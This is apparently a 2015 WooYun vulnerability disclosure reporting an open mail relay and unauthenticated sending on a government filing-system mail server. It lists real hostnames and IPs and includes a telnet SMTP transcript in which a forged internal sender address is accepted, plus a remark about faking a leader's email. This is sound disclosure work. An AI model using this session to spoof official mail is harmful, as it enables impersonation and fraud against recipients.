当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095752

漏洞标题:某备案相关邮件系统两个漏洞

相关厂商:某备案相关系统

漏洞作者: 鬼色[N.S.T]

提交时间:2015-02-05 19:05

修复时间:2015-03-22 19:06

公开时间:2015-03-22 19:06

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-05: 细节已通知厂商并且等待厂商处理中
2015-02-10: 厂商已经确认,细节仅向厂商公开
2015-02-20: 细节向核心白帽子及相关领域专家公开
2015-03-02: 细节向普通白帽子公开
2015-03-12: 细节向实习白帽子公开
2015-03-22: 细节向公众公开

简要描述:

sendmail重定向传送、未登录也能发邮件,要是伪造领导的邮箱给备案的人发邮件,会不会撤销任意网站的备案信息什么的呢……

详细说明:

1、sendmail重定向传送、
sendmail 服务器接受邮件以'user@host1@example.com'格式发送到收件人,利用该命令来达到在防火墙后面的邮件服务器,为了避免由通过受影响的主机路由邮件的检测。
2、未登录也能发邮件、
可使用任意@miibeian.gov.cn后缀的邮箱地址发送邮件。

漏洞证明:

工信部的邮箱服务器好像有两台,但其实就mail1.miibeian.gov.cn在用吧。
mail.miibeian.gov.cn 25 219.143.225.39
mail1.miibeian.gov.cn 25 219.143.225.38

工信部1.jpg


工信部2.jpg


欢迎使用 Microsoft Telnet Client
Escape 字符为 'CTRL+]'
Microsoft Telnet> set localecho
本地回显启用
Microsoft Telnet> set logfile neuron.txt
日志文件: neuron.txt
客户端登录
Microsoft Telnet> open mail1.miibeian.gov.cn 25
正在连接mail1.miibeian.gov.cn...
220 mail1.miibeian.gov.cn ESMTP Sendmail 8.13.8/8.13.8; Thu, 5 Feb 2015 09:29:01
+0800
EHLO miibeian.gov.cn
501 5.0.0 Invalid domain name
EHLO miibeian.gov.cn
250-mail1.miibeian.gov.cn Hello [119.129.209.201], pleased to meet you
250-ENHANCEDSTATUSCODES
250-PIPELINING
250-8BITMIME
250-SIZE
250-DSN
250-ETRN
250-AUTH GSSAPI DIGEST-MD5 CRAM-MD5 LOGIN PLAIN
250-DELIVERBY
250 HELP
MAIL FROM:neuron@miibeian.gov.cn
250 2.1.0 neuron@miibeian.gov.cn... Sender ok
RCPT TO:webmaster@miibeian.gov.cn NOTIFY=success,failure
250 2.1.5 webmaster@miibeian.gov.cn... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
hello
this is one test mail, if you receive this email, prove your mail server unsafe.
.test by neuron
.
250 2.0.0 t151T1I7009914 Message accepted for delivery
quit
221 2.0.0 mail1.miibeian.gov.cn closing connection

修复方案:

本来想告诉你们的,但是http://www.miitbeian.gov.cn/getVerifyCode?82 你们这破验证码,怎么输都是错,错错…… NEURON最牜庇。

版权声明:转载请注明来源 鬼色[N.S.T]@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-02-10 11:52

厂商回复:

CNVD确认所述情况,转由CNCERT向工信部通报。

最新状态:

暂无